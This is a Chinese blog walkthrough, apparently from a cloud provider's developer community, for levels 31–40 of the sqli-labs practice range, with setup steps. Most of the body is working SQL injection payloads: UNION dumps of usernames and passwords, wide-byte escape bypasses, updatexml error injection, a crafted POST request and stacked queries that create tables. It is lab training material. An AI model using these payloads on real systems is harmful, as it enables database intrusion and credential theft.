AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

sql-lib 搭建&31-40关

2022-12-02 229 发布于江苏
版权
举报
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: sql-lib 搭建&31-40关

sql-lib靶场搭建-windows操作系统

下载phpstudy,下载地址:https://www.xp.cn/download.html

安装好

https://github.com/Audi-1/sqli-labs

将下载好后解压放到www下新建wwww.guiltyfet.com目录

同步hosts文件

第31关

在双引号后面添加括号进行闭合

http://www.guiltyfet.com/sqli/Less-31/?id=-1%22)union%20select%201,2,database()%20–+

或者

?id=1&id=0") union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23

区分大小写用%23闭合

获得用户名密码

http://www.guiltyfet.com/sqli/Less-31/?id=-1") union select 1,2,group_concat(username,0x7e,password) from users--+

第32关

这关是宽字节绕过引号转义

原理大概来说就是,一个双字节组成的字符,比如一个汉字‘我’的utf8编码为%E6%88%91 当我们使用?id=-1%E6’ 这样的构造时,’ 前面加的 \ 就会和%E6 合在一起,但是又不是一个正常汉字,但是起到了注掉 \ 的作用。

获得数据库名 ?id=-1%E6’ union select 1,version(),database() --+

在爆列的时候我们要用到‘user’,有单引号,我们用十六进制编码替代,users 使用十六进制编码得到7573657273,构造为0x7573657273

获取列名   ?id=-1%E6' union select 1,version(),group_concat(column_name) from information_schema.columns where table_name =0x7573657273--+

http://www.guiltyfet.com/sqli/Less-32/?id=-1%E6' union select 1,2,group_concat(username,0x3b,password) from users--+

第33关

和32一样

http://www.guiltyfet.com/sqli/Less-33/?id=-1%E6' union select 1,2,group_concat(username,0x3b,password) from users--+

第34关

获取数据库版本和数据库名 uname=admin%99’ union select version(),database()–+&passwd=admin&submit=Submit

POST /sqli/Less-34/ HTTP/1.1
Host: www.guiltyfet.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
Origin: http://www.guiltyfet.com
Connection: close
Referer: http://www.guiltyfet.com/sqli/Less-34/
Upgrade-Insecure-Requests: 1
uname=admin%99'  union select 1,group_concat(username,0x3b,password) from users#&passwd=admin&passwd=admin&submit=Submit

获取数据库密码

第35关

获得版名库名

http://www.guiltyfet.com/sqli/Less-35/?id=-1%20union%20select%201,version(),database()--+

获得表明

http://www.guiltyfet.com/sqli/Less-35/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

爆列名 ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#

爆用户名和密码

http://www.guiltyfet.com/sqli/Less-35/?id=-1%20union%20select%201,2,group_concat(username,0x3b,password)%20from%20users#

第36关

爆库

http://www.guiltyfet.com/sqli/Less-36/?id=0%bb' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

爆表

http://www.guiltyfet.com/sqli/Less-36/?id=0%bb' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),0x7e),1)--+

通过宽字节 %df 或者utf-16来解决

爆用户密码

http://www.guiltyfet.com/sqli/Less-36/?id=-1%E6' union select 1,2,group_concat(username,0x3b,password) from users--+

宽字节注入

第37关

输入admin/admin抓包

%bb’ union select 1,2#

爆库
uname=admin%bb' union select database(),user()#&passwd=admin&submit=Submit

爆表
uname=admin%bb' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=admin&submit=Submit

爆字段

admin%bb' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#

爆数据
uname=admin%bb' union select group_concat(username),group_concat(password) from users#
&passwd=admin&submit=Submit

第38关

http://www.guiltyfet.com/sqli/Less-38/?id=0%FE' union select 1,version(),database() %23

http://www.guiltyfet.com/sqli/Less-38/?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

获得列名
http://www.guiltyfet.com/sqli/Less-38/?id=?id=0%FE' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23

获得数据
http://www.guiltyfet.com/sqli/Less-38/?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

新建表
http://www.guiltyfet.com/sqli/Less-38/?id=1';create table test like users;%23

在查询就有新建的表

第39关

http://www.guiltyfet.com/sqli/Less-39/?id=0%20union%20select%201,version(),database()%20%23

获得表名 ?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

获得列名 ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23

获取用户名密码 ?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

第40关

加括号,堆叠注入

获得列名
http://www.guiltyfet.com/sqli/Less-40/?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23

爆数据
http://www.guiltyfet.com/sqli/Less-40/?id=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

文章标签:
Windows
数据安全/隐私保护
数据库
5q2a2sugf4ej6
+关注
59文章
目录
打赏
0
0
0
0
10
分享
相关文章
土木林森
|
SQL 数据库连接 Shell
python连接SqlServer数据库
要使用Python连接SQL Server数据库,你需要先安装pyodbc库,然后使用它来建立连接。
土木林森
354 1
python连接SqlServer数据库
仅此而已bo
|
SQL 数据库 Python
Python 数据库Insert语句脚本生成工具(SQL Server)
Python 数据库Insert语句脚本生成工具(SQL Server)
仅此而已bo
439 0
Python 数据库Insert语句脚本生成工具(SQL Server)
陶然同学
|
SQL 存储 JSON
【MySQL高级】优化SQL步骤
【MySQL高级】优化SQL步骤
陶然同学
132 0
【MySQL高级】优化SQL步骤
码农飞哥
|
SQL 存储 监控
【MySQL从入门到精通】【高级篇】(二十二)慢查询日志分析,SHOW PROFILE查看SQL执行成本
上一篇文章我们介绍数据库的优化步骤【MySQL从入门到精通】【高级篇】(二十一)数据库优化步骤_查看系统性能参数,其中,说到了通过开启慢查询日志来分析慢查询的SQL。这篇文章就是具体来介绍如何开启慢查询日志以及如何分析慢查询日志。
码农飞哥
456 0
【MySQL从入门到精通】【高级篇】(二十二)慢查询日志分析,SHOW PROFILE查看SQL执行成本
fanstuck
|
SQL 存储 Java
Python-sqlparse解析SQL工具库一文详解(一)
Python-sqlparse解析SQL工具库一文详解(一)
fanstuck
4212 0
Python-sqlparse解析SQL工具库一文详解(一)
fanstuck
|
SQL Java 数据挖掘
Python-sqlparse解析SQL工具库一文详解(二)
Python-sqlparse解析SQL工具库一文详解(二)
fanstuck
1345 0
Python-sqlparse解析SQL工具库一文详解(二)
lemotree
|
SQL BI
oracle-优化-如何对sql创建和管理sql_profile
lemotree
422 0
程序员晚枫
|
SQL 数据库 Python
Python+数据库:Python连接sqlserver数据库,执行原生sql语句,并输出查询结果
Python+数据库:Python连接sqlserver数据库,执行原生sql语句,并输出查询结果
程序员晚枫
614 0
嗯哼9925
|
SQL C# 数据库
c#直接调用ssis包实现Sql Server的数据导入功能
嗯哼9925
1862 0
科技小能手
|
SQL 关系型数据库 数据库管理
mysql5.6使用profile工具分析sql
科技小能手
1205 0

热门文章

最新文章

  • 1
    【复盘】从肩挑背扛到99%聚石塔订单,AliCloudDB四年双11技术突破!
    11
  • 2
    2011年功力的德哥教你两天撸通PostgreSQL - 入门、开发、原理、管理、调优
    8375
  • 3
    CentOS7系统配置国内yum源和epel源
    3043
  • 4
    Curl指定源端口访问网站
    4675
  • 5
    Python-OpenCV学习(十)用GrabCUt算法进行图片前景的提取
    6334
  • 6
    计算机基础(1)——计算机体系结构和组成
    71
  • 7
    Xshell连接虚拟机失败的解决方法
    5
  • 8
    数据可视化D3系列——饼状图
    3
  • 9
    新Macbook电池续航能力表现欠佳,用户表示用不到5小时
    568
  • 10
    删除mongodb库
    593
  • 1
    HarmonyOS NEXT - ArkUI: Text组件
    98
  • 2
    # 【Java全栈学习笔记-U1-day02】变量+数据类型+运算符
    23
  • 3
    智能手表续航太短?聊聊可穿戴设备的能耗管理黑科技
    26
  • 4
    大模型也能当“运维警察”?——大模型技术在异常检测中的应用
    35
  • 5
    Hadoop生态系统:从小白到老司机的入门指南
    30
  • 6
    HarmonyOS NEXT - 页面路由
    24
  • 7
    HarmonyOS NEXT - Stage模型和应用/组件级配置
    25
  • 8
    HarmonyOS NEXT函数和自定义构建函数
    23
  • 9
    HarmonyOS NEXT条件语句和循环迭代
    23
  • 10
    模型即产品:万字详解RL驱动的AI Agent模型如何巨震AI行业范式
    32

    • 相关课程

    更多
  • SQL入门与实践
  • SQL进阶及查询

    • 相关电子书

    更多
  • Spark SQL最佳实践
  • SQL Server云化思考与实践
  • SQL Server 云化思考与实践

    • 相关实验场景

    更多
  • SQLServer数据库的创建
  • 如何开通SQL Server的专属集群
    • 下一篇
    基于ECS搭建云上博客
    目录